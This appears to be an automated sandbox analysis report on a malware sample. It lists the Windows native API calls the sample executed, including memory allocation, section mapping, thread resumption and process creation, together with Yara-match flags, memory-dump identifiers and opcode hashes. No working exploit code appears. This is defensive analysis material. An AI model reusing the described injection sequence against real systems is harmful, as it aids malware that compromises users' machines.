                                                                                                                                                      					L25:
                                                                                                                                                      					return _v8;
                                                                                                                                                      				}
                                                                                                                                                      			}


                                                                                                                                                      APIs
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CC4BC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                      • String ID: "$athan
                                                                                                                                                      • API String ID: 885266447-2304005628
                                                                                                                                                      • Opcode ID: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                                                                                                                      • Instruction ID: 03bf6c742900234f6e4d0b864925580b806423172824f140fa16395e5c326d89
                                                                                                                                                      • Opcode Fuzzy Hash: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                                                                                                                      • Instruction Fuzzy Hash: E1419CB1A00605AFDB28DF68C895FBABBB9FB44304F14C82DE85ADB251D734E940CB11
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Executed Functions

                                                                                                                                                      APIs
                                                                                                                                                      • NtQueryInformationProcess.NTDLL ref: 01E699BF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378587189.0000000001E60000.00000040.00000001.sdmp, Offset: 01E60000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InformationProcessQuery
                                                                                                                                                      • String ID: 0
                                                                                                                                                      • API String ID: 1778838933-4108050209
                                                                                                                                                      • Opcode ID: 39eb83527b9dfb0958a03f1802a1a4be67d21b07a2af987d97fec1c560f0ff77
                                                                                                                                                      • Instruction ID: c85d515c69da10ae82627d231b88aad73f2c67c1ac48ca427b07c7ba1d004072
                                                                                                                                                      • Opcode Fuzzy Hash: 39eb83527b9dfb0958a03f1802a1a4be67d21b07a2af987d97fec1c560f0ff77
                                                                                                                                                      • Instruction Fuzzy Hash: 46F16070658A8D8FDB69EF68CC94AEEB7E4FBA8304F80562AD44EC7250DF349541CB41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378587189.0000000001E60000.00000040.00000001.sdmp, Offset: 01E60000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Section$CloseCreateView
                                                                                                                                                      • String ID: @$@
                                                                                                                                                      • API String ID: 1133238012-149943524
                                                                                                                                                      • Opcode ID: 2dd0556cb7a3a44c3eaa392cada0241847c7aae05cd783fd05879651b916d73c
                                                                                                                                                      • Instruction ID: b1deeb005a5f835918bf70e9f67da9e5b0cf4c53e3d4414b4c4686b14fb5ac0a
                                                                                                                                                      • Opcode Fuzzy Hash: 2dd0556cb7a3a44c3eaa392cada0241847c7aae05cd783fd05879651b916d73c
                                                                                                                                                      • Instruction Fuzzy Hash: 0A61A270618B498FCB58DF68D8856AEBBE0FF98354F50062EE58AC3251DF35D441CB86
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378587189.0000000001E60000.00000040.00000001.sdmp, Offset: 01E60000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Section$CreateView
                                                                                                                                                      • String ID: @$@
                                                                                                                                                      • API String ID: 1585966358-149943524
                                                                                                                                                      • Opcode ID: 82cb147daf14df8b0d9c936528d241d68235823296eaefc453e7a0fe9bd717e9
                                                                                                                                                      • Instruction ID: f824d7a9afd9ff90d7f738df0856a3f7ec950e3906b81350c41a3335d387a956
                                                                                                                                                      • Opcode Fuzzy Hash: 82cb147daf14df8b0d9c936528d241d68235823296eaefc453e7a0fe9bd717e9
                                                                                                                                                      • Instruction Fuzzy Hash: 3C518E70618B098FC758DF18D895AAEBBE4FB98344F50062EE98AC3251DF35D581CB86
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00134B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00134B77,007A002E,00000000,00000060,00000000,00000000), ref: 00139D9D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                      • Instruction ID: c2695d36a07e3dac24dd742e60170a3065d012237968673667184f85daaeeb15
                                                                                                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                      • Instruction Fuzzy Hash: A3F0B2B2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA5D97241C630E8118BA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00134B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00134B77,007A002E,00000000,00000060,00000000,00000000), ref: 00139D9D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                      • Opcode ID: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                                                                                                                                                      • Instruction ID: 869e384ed573a00bc37e9dbe5d1a976b741f1bdd6ae7504b1e6801f85e76a322
                                                                                                                                                      • Opcode Fuzzy Hash: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                                                                                                                                                      • Instruction Fuzzy Hash: 5FF0B6B2204149ABCB08DF98DD85CDBB7ADBF8C354B05864CFA5D93201D630E8518BA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00134B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00134B77,007A002E,00000000,00000060,00000000,00000000), ref: 00139D9D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                      • Opcode ID: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                      • Instruction ID: 6337283eb65c4101f9a0ee3fd8d1c36fb4deb8b8eadcac0e0c19859b5995b288
                                                                                                                                                      • Opcode Fuzzy Hash: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                      • Instruction Fuzzy Hash: 00F06CB2214109AF8B48DF98D890DEB73F9BF8C354B159648FA4D93201D631E851CBA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378587189.0000000001E60000.00000040.00000001.sdmp, Offset: 01E60000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                      • Opcode ID: 7b4da7a0d455cc38696462cd40052f2bf395cdaf7ac6e97e0619bd9c66e01c65
                                                                                                                                                      • Instruction ID: e1bdec0eebf47511bf583c1177f7eaf3db6b690d6ddc134603bf05169a8a90c4
                                                                                                                                                      • Opcode Fuzzy Hash: 7b4da7a0d455cc38696462cd40052f2bf395cdaf7ac6e97e0619bd9c66e01c65
                                                                                                                                                      • Instruction Fuzzy Hash: 1F21AE30A14A498FDB64EF68C8887AEB7E4FF98358F40152AE50DC7251DB749981C781
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(00134D32,5EB6522D,FFFFFFFF,001349F1,?,?,00134D32,?,001349F1,FFFFFFFF,5EB6522D,00134D32,?,00000000), ref: 00139E45
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                      • Instruction ID: 70b658380ec60f4aa789d4b04bceed0980b547b4f65c7bbde62b76fb38720e03
                                                                                                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                      • Instruction Fuzzy Hash: AEF0BDB2200108AFCB14DF89DC91EEB77ADEF8C754F158248BE5D97241D630E811CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(00134D32,5EB6522D,FFFFFFFF,001349F1,?,?,00134D32,?,001349F1,FFFFFFFF,5EB6522D,00134D32,?,00000000), ref: 00139E45
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      • Opcode ID: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                                                                                                                                                      • Instruction ID: 05a326e8818514abdec4d43c542d03df45b39e90e537a03c69dbaafb0683d2d2
                                                                                                                                                      • Opcode Fuzzy Hash: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                                                                                                                                                      • Instruction Fuzzy Hash: 45F0A4B6200108AFCB14DF89DC91EEB77A9AF8C354F168649BA5DA7251C630E8118BA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00122D11,00002000,00003000,00000004), ref: 00139F69
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      • Opcode ID: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                                                                                                                                                      • Instruction ID: 778357d56b27276f2a7b0dfa19d7c3730a44df0bb7c265a3fcc9877e59f16782
                                                                                                                                                      • Opcode Fuzzy Hash: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                                                                                                                                                      • Instruction Fuzzy Hash: DCF058B2210218AFCB18DF88DC91EEB77ADAF88310F158208FA5C97241C630E910CBE0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00122D11,00002000,00003000,00000004), ref: 00139F69
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                      • Instruction ID: 4f4ac166a8b710a4bc06ae19ad0e10a5ad7a4251d88ac70fe9679c7f19c47165
                                                                                                                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                      • Instruction Fuzzy Hash: 95F015B2200208AFCB14DF89CC81EAB77ADAF88754F118148BE58A7241C630F810CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(00134D10,?,?,00134D10,00000000,FFFFFFFF), ref: 00139EA5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                      • Opcode ID: bc5b2de0da1b5ef0375440ba87564657268f0f0a75ea414756b91c00acfdd9db
                                                                                                                                                      • Instruction ID: 3a829b415f7fd37cbb9ddc204cb71f2f8a8deb2a3a3a397260e3395d64ed8444
                                                                                                                                                      • Opcode Fuzzy Hash: bc5b2de0da1b5ef0375440ba87564657268f0f0a75ea414756b91c00acfdd9db
                                                                                                                                                      • Instruction Fuzzy Hash: 05E0C235200104AFD710EFA8CC8AFE7BB68EF48350F064199FA9CAB241C631F650C790
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(00134D10,?,?,00134D10,00000000,FFFFFFFF), ref: 00139EA5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                      • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                      • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                      • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00123AF8), ref: 0013A08D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00123AF8), ref: 0013A08D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0012834A
                                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0012836B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0012834A
                                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0012836B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0013A124
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(001344F6,?,00134C6F,00134C6F,?,001344F6,?,?,?,?,?,00000000,00000000,?), ref: 0013A04D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0012F192,0012F192,?,00000000,?,?), ref: 0013A1F0
